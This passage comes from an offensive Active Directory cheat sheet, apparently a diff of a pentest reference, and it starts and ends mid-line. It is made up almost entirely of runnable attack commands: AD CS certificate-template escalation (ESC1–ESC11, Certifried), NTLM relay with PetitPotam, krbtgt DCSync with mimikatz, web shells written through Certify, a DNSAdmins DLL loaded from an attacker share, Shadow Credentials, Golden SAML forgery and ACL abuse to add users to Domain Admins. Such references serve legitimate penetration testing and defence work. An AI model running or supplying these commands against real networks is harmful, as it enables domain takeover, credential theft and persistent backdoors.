-keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx - ``` -* Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus - ```ps1 - Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx - ``` - -**WARNING**: These certificates will still be usable even if the user or computer resets their password! - -**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints. - - -### ESC2 - Misconfigured Certificate Templates - -Requirements: -* Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0) - -Exploitation: -* Find template - ```ps1 - PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local' - ``` -* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates). - - -### ESC3 - Misconfigured Enrollment Agent Templates - -> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users - -* Request a certificate based on the vulnerable certificate template ESC3. - ```ps1 - $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3' - [*] Saved certificate and private key to 'john.pfx' - ``` -* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user - ```ps1 - $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx' - ``` - - -### ESC4 - Access Control Vulnerabilities - -> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability - -* Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) - ```ps1 - python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl - ``` -* Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1 - ```ps1 - python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag - - # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. - C:\>StandIn.exe --adcs --filter WebServer --ess --add - ``` -* Perform ESC1 and then restore the value - ```ps1 - python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag - ``` - -Using Certipy - -```ps1 -# overwrite the configuration to make it vulnerable to ESC1 -certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old -# request a certificate based on the ESC4 template, just like ESC1. -certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local' -# restore the old configuration -certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json -``` - -### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 - -> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name. - -Exploitation: -* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag. - ```ps1 - Certify.exe cas - ``` -* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names - ```ps1 - .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin - ``` - -Mitigation: -* Remove the flag : `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2` - - -### ESC7 - Vulnerable Certificate Authority Access Control - -Exploitation: -* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions - ```ps1 - Certify.exe find /vulnerable - ``` -* Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6) - ```ps1 - Certify.exe setconfig /enablesan /restart - ``` -* Request the certificate with the desired SAN. - ```ps1 - Certify.exe request /template:User /altname:super.adm - ``` -* Grant approval if required or disable the approval requirement - ```ps1 - # Grant - Certify.exe issue /id:[REQUEST ID] - # Disable - Certify.exe setconfig /removeapproval /restart - ``` - -Alternative exploitation from **ManageCA** to **RCE** on ADCS server: - -```ps1 -# Get the current CDP list. Useful to find remote writable shares: -Certify.exe writefile /ca:SERVER\ca-name /readonly - -# Write an aspx shell to a local web directory: -Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx - -# Write the default asp shell to a local web directory: -Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp - -# Write a php shell to a remote web directory: -Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php -``` - - -### ESC8 - AD CS Relay Attack - -> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket. - -Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101) - -* **Version 1**: NTLM Relay + Rubeus + PetitPotam - ```powershell - impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs - impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate - # For a member server or workstation, the template would be "Computer". - # Other templates: workstation, DomainController, Machine, KerberosAuthentication - - # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam - # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN - git clone https://github.com/topotam/PetitPotam - python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP - python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP - python3 dementor.py -u -p -d - python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local - - # Use the certificate with rubeus to request a TGT - Rubeus.exe asktgt /user: /certificate: /ptt - Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt - - # Now you can use the TGT to perform a DCSync - mimikatz> lsadump::dcsync /user:krbtgt - ``` - -* **Version 2**: NTLM Relay + Mimikatz + Kekeo - ```powershell - impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController - - # Mimikatz - mimikatz> misc::efs /server:dc.lab.local /connect: /noauth - - # Kekeo - kekeo> base64 /input:on - kekeo> tgt::ask /pfx: /user:dc$ /domain:lab.local /ptt - - # Mimikatz - mimikatz> lsadump::dcsync /user:krbtgt - ``` - -* **Version 3**: Kerberos Relay - ```ps1 - # Setup the relay - sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine - - # Run mitm6 - sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v - ``` - -* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed. - ```powershell - https://github.com/bats3c/ADCSPwn - adcspwn.exe --adcs --port [local port] --remote [computer] - adcspwn.exe --adcs cs.pwnlab.local - adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 - adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt - adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local - - # ADCSPwn arguments - adcs - This is the address of the AD CS server which authentication will be relayed to. - secure - Use HTTPS with the certificate service. - port - The port ADCSPwn will listen on. - remote - Remote machine to trigger authentication from. - username - Username for non-domain context. - password - Password for non-domain context. - dc - Domain controller to query for Certificate Templates (LDAP). - unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . - output - Output path to store base64 generated crt. - ``` - -* **Version 5**: Certipy ESC8 - ```ps1 - certipy relay -ca 172.16.19.100 - ``` - - -### ESC9 - No Security Extension - -Requirements: -* `StrongCertificateBindingEnforcement` set to `1` (default) or `0` -* Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value -* Certificate specifies `Any Client` authentication EKU -* `GenericWrite` over any account A to compromise any account B - -**Scenario** - -John@corp.local has **GenericWrite** over Jane@corp.local, and we want to compromise Administrator@corp.local. -Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value. - -* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite) - ```ps1 - certipy shadow auto -username John@corp.local -p Passw0rd -account Jane - ``` -* Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part - ```ps1 - certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator - ``` -* Request the vulnerable certificate template ESC9 from Jane's account. - ```ps1 - certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9 - # userPrincipalName in the certificate is Administrator - # the issued certificate contains no "object SID" - ``` -* Restore userPrincipalName of Jane to Jane@corp.local. - ```ps1 - certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local - ``` -* Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user. - ```ps1 - certipy auth -pfx administrator.pfx -domain corp.local - # Add -domain to your command line since there is no domain specified in the certificate. - ``` - -### ESC11 - Relaying NTLM to ICPR - -> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue - -Requirements: -* [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork -* [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork - -Exploitation: -1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output -2. Setup a relay using Impacket ntlmrelay and trigger a connection to it. - ```ps1 - ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support - ``` - -### Certifried CVE-2022-26923 - -> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege. - -* Find `ms-DS-MachineAccountQuota` - ```ps1 - python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 getObjectAttributes 'DC=lab,DC=local' ms-DS-MachineAccountQuota - ``` -* Add a new computer in the Active Directory, by default `MachineAccountQuota = 10` - ```ps1 - python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 addComputer cve 'CVEPassword1234*' - certipy account create 'lab.local/username:Password123*@dc.lab.local' -user 'cve' -dns 'dc.lab.local' - ``` -* [ALTERNATIVE] If you are `SYSTEM` and the `MachineAccountQuota=0`: Use a ticket for the current machine and reset its SPN - ```ps1 - Rubeus.exe tgtdeleg - export KRB5CCNAME=/tmp/ws02.ccache - python bloodyAD -d lab.local -u 'ws02$' -k --host dc.lab.local setAttribute 'CN=ws02,CN=Computers,DC=lab,DC=local' servicePrincipalName '[]' - ``` -* Set the `dNSHostName` attribute to match the Domain Controller hostname - ```ps1 - python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 setAttribute 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName '["DC.lab.local"]' - python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 getObjectAttributes 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName - ``` -* Request a ticket - ```ps1 - # certipy req 'domain.local/cve$:CVEPassword1234*@ADCS_IP' -template Machine -dc-ip DC_IP -ca discovered-CA - certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA - ``` -* Either use the pfx or set a RBCD on your machine account to takeover the domain - ```ps1 - certipy auth -pfx ./dc.pfx -dc-ip 10.10.10.10 - - openssl pkcs12 -in dc.pfx -out dc.pem -nodes - python bloodyAD.py -d lab.local -c ":dc.pem" -u 'cve$' --host 10.10.10.10 setRbcd 'CVE$' 'CRASHDC$' - getST.py -spn LDAP/CRASHDC.lab.local -impersonate Administrator -dc-ip 10.10.10.10 'lab.local/cve$:CVEPassword1234*' - secretsdump.py -user-status -just-dc-ntlm -just-dc-user krbtgt 'lab.local/Administrator@dc.lab.local' -k -no-pass -dc-ip 10.10.10.10 -target-ip 10.10.10.10 - ``` - - -### Pass-The-Certificate - -> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential" - -* Windows - ```ps1 - # Information about a cert file - certutil -v -dump admin.pfx - - # From a Base64 PFX - Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show - - # Grant DCSync rights to an user - ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid - # To restore - ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt - ``` -* Linux - ```ps1 - # Base64-encoded PFX certificate (string) (password can be set) - gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" - ​ - # PEM certificate (file) + PEM private key (file) - gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" - - # PFX certificate (file) + password (string, optionnal) - gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" - - # Using Certipy - certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain' - certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx" - ``` - - -## UnPAC The Hash - -Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate. - -* Windows - ```ps1 - # Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC. - Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show - ``` -* Linux - ```ps1 - # Obtain a TGT by validating a PKINIT pre-authentication - $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" - - # Use the session key to recover the NT hash - $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME' - ``` - - -## Shadow Credentials - -> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match. - -:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists - -**Requirements**: -* Domain Controller on (at least) Windows Server 2016 -* Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured -* PKINIT Kerberos authentication -* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object - -**Exploitation**: -- From Windows, use [Whisker](https://github.com/eladshamir/Whisker): - ```powershell - # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. - Whisker.exe list /target:computername$ - # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. - Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" - Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] - # Removes a key credential from the target object specified by a DeviceID GUID. - Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b - ``` - -- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker): - ```bash - # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. - python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" - # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. - pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" - python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" - # Removes a key credential from the target object specified by a DeviceID GUID. - python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" - ``` - -**Scenario**: - -- **Scenario 1**: Shadow Credential relaying - - Trigger an NTLM authentication from `DC01` (PetitPotam) - - Relay it to `DC02` (ntlmrelayx) - - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) - - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` - -- **Scenario 2**: Workstation Takeover with RBCD - ```ps1 - # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81 - - # Set up ntlmrelayx to relay authentication from target workstation to DC - proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81 - - # Execute printer bug to trigger authentication from target workstation - proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file - - # Get a TGT using the newly acquired certificate via PKINIT - proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR - - # Get a ST (service ticket) for the target account - proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v - - # Utilize the ST for future activity - export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache - proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab - ``` - -## Active Directory Groups - -### Dangerous Built-in Groups Usage - -If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object. - -> The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s). - -Find users with `AdminCount=1`. - -```powershell -crackmapexec ldap 10.10.10.10 -u username -p password --admin-count -# or -python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.10.10.10 -jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json -# or -Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)" -Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)" -# or -([adsisearcher]"(AdminCount=1)").findall() -``` - - -### AdminSDHolder Abuse - -> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins. - -If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by `SDProp` (in an hour). -E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group. - -```powershell -# Add a user to the AdminSDHolder group: -Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -Verbose - -# Right to reset password for toto using the account titi -Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword - -# Give all rights -Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All -``` - - -### Abusing DNS Admins Group - -> It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM). - -:warning: Require privileges to restart the DNS service. - -* Enumerate members of DNSAdmins group - ```ps1 - Get-NetGroupMember -GroupName "DNSAdmins" - Get-ADGroupMember -Identity DNSAdmins - ``` -* Change dll loaded by the DNS service - ```ps1 - # with RSAT - dnscmd /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll - dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll - - # with DNSServer module - $dnsettings = Get-DnsServerSetting -ComputerName -Verbose -All - $dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll" - Set-DnsServerSetting -InputObject $dnsettings -ComputerName -Verbose - ``` -* Check the previous command success - ```ps1 - Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll - ``` -* Restart DNS - ```ps1 - sc \\dc01 stop dns - sc \\dc01 start dns - ``` - -### Abusing Schema Admins Group - -> The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory. - - -### Abusing Backup Operators Group - -> Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers. - -This groups grants the following privileges : -- SeBackup privileges -- SeRestore privileges - -* Get members of the group: - ```ps1 - PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse - ``` -* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege) - ```ps1 - Import-Module .\SeBackupPrivilegeUtils.dll - Import-Module .\SeBackupPrivilegeCmdLets.dll - - Set-SeBackupPrivilege - Get-SeBackupPrivilege - ``` -* Retrieve sensitive files - ```ps1 - Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite - ``` -* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive - ```ps1 - $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64) - $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') - $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"} - ``` -* Retrieve SAM,SECURITY and SYSTEM hives - * [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\` - * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK` - - -## Active Directory Federation Services - -### ADFS - Golden SAML - -**Requirements**: -* ADFS service account -* The private key (PFX with the decryption password) - -**Exploitation**: -* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` -* Convert PFX and Private Key to binary format - ```ps1 - # For the pfx - echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin - # For the private key - echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin - ``` -* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). - ```ps1 - mkdir ADFSpoofTools - cd $_ - git clone https://github.com/dmb2168/cryptography.git - git clone https://github.com/mandiant/ADFSpoof.git - virtualenv3 venvADFSSpoof - source venvADFSSpoof/bin/activate - pip install lxml - pip install signxml - pip uninstall -y cryptography - cd cryptography - pip install -e . - cd ../ADFSpoof - pip install -r requirements.txt - python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls - /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' - ``` - -Other interesting tools to exploit AD FS: -* [WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - - -## Active Directory Integrated DNS - -ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic. Active Directory will need some time (~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol. - -* Enumerate all records using [dirkjanm/adidnsdump](https://github.com/dirkjanm/adidnsdump) - ```ps1 - adidnsdump -u DOMAIN\\user --print-zones dc.domain.corp (--dns-tcp) - ``` -* Query a node using [dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx) - ```ps1 - dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query $DomainController (--legacy) - ``` -* Add a node and attach a record - ```ps1 - dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController - ``` - -The common way to abuse ADIDNS is to set a wildcard record and then passively listen to the network. - -```ps1 -Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y -``` - - -## Abusing Active Directory ACLs/ACEs - -Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). - -```powershell -ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show -``` - -### GenericAll - -* **GenericAll on User** : We can reset user's password without knowing the current password -* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user hacker) to the Domain Admin group : - * On Windows : `net group "domain admins" hacker /add /domain` - * On Linux: - * using the Samba software suite : - `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'hacker%MyPassword123' -W DOMAIN -I [DC IP]` - * using bloodyAD: - `bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'` - -* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it. - ```powershell - # Check for interesting permissions on accounts: - Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} - - # Check if current user has already an SPN setted: - PowerView2 > Get-DomainUser -Identity | select serviceprincipalname - - # Force set the SPN on the account: Targeted Kerberoasting - PowerView2 > Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'} - PowerView3 > Set-DomainObject -Identity -Set @{serviceprincipalname='any/thing'} - - # Grab the ticket - PowerView2 > $User = Get-DomainUser username - PowerView2 > $User | Get-DomainSPNTicket | fl - PowerView2 > $User | Select serviceprincipalname - - # Remove the SPN - PowerView2 > Set-DomainObject -Identity username -Clear serviceprincipalname - ``` - -* **GenericAll/GenericWrite** : We can change a victim's **userAccountControl** to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back. - * On Windows: - ```powershell - # Modify the userAccountControl - PowerView2 > Get-DomainUser username | ConvertFrom-UACValue - PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose - - # Grab the ticket - PowerView2 > Get-DomainUser username | ConvertFrom-UACValue - ASREPRoast > Get-ASREPHash -Domain domain.local -UserName username - - # Set back the userAccountControl - PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose - PowerView2 > Get-DomainUser username | ConvertFrom-UACValue - ``` - * On Linux: - ```bash - # Modify the userAccountControl - $ bloodyAD.py --host [DC IP] -d [DOMAIN] -u [AttackerUser] -p [MyPassword] setUserAccountControl [Target_User] 0x400000 True - - # Grab the ticket - $ GetNPUsers.py DOMAIN/target_user -format -outputfile - - # Set back the userAccountControl - $ bloodyAD.py --host [DC IP] -d [DOMAIN] -u [AttackerUser] -p [MyPassword] setUserAccountControl [Target_User] 0x400000 False - ``` - - -### GenericWrite - -* Reset another user's password - * On Windows: - ```powershell - # https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1 - $user = 'DOMAIN\user1'; - $pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force; - $creds = New-Object System.Management.Automation.PSCredential $user, $pass; - $newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force; - Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds; - ``` - * On Linux: - ```bash - # Using rpcclient from the Samba software suite - rpcclient -U 